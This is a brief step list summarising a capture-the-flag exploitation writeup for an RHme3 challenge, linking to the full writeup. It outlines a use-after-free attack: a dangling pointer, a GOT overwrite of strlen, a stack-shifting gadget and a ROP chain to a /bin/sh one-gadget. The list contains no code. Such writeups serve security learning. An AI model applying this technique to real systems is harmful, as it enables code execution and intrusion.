- Create player1, set 0x21 for all fields
- Add, Select, Remove player2 to get dangling pointer
- Edit player2 via dangling pointer to point at player1 data
- Write the address of strlen() in GOT to player2 name (overwriting player1 name pointer)
- Edit player1 name, dereferencing GOT pointer and overwriting GOT address
- Point strlen to gadget to shift stack
- ROP to clear a couple of registers before hitting /bin/sh one gadget
Original writeup (https://flawed.net.nz/2017/08/29/rhme3-exploitation-writeup/).
